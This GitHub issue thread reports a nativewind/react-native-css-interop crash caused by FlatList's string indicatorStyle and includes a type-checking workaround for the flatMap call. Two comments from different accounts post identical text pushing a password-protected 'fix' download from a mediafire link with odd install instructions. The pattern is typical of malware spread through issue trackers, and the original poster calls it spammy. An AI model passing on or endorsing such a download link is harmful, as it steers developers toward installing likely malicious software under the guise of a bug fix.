### ISSUE TITLE
FlatList breaks react-native-css-intrerop with string

### ISSUE THREAD

**Issue by Timmwardion** [nativewind/nativewind#1008]
Building an RN/expo app with Nativewind and SendbirdUIKit. A component in SendbirdUIKit uses FlatList. It's implementation of that includes this code: 

```
indicatorStyle: select({
      light: 'black',
      dark: 'white'
    })
```

This breaks react-native-css-interop at this code (Line 248 of native-interop.js):

 ```
state.normal = normalRules
        .filter(Boolean)
        .sort(specificityCompare)
        .flatMap((rule) => ("$type" in rule ? rule.declarations : rule));
```
because it is looking for an object and the value for indicatorStyle is a string. The error thrown is:

` "right operand of 'in' is not an object"`

I've been able to avoid the problem in dev by replacing the code above with the following:

```
state.normal = normalRules
    .filter(Boolean)
    .sort(specificityCompare)
    .flatMap((rule) => {
        if (rule && typeof rule === 'object' && '$type' in rule) {
            return rule.declarations;
        } else if (rule && typeof rule === 'object') {
            return rule;
        } else {
            return []; // TODO: handle this
        }
    });
```

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Timmwardion** [comment]
Hmmmm. That's a bit spammy 👆

**Comment by danstepanov** [comment]
We are closing all pre-v4.1 issues now that v4.1 is released. If the problem is still happening with the latest v4.1, [please open a new issue](https://github.com/nativewind/nativewind/blob/next/contributing.md#opening-an-issue) and reference this one in the description.
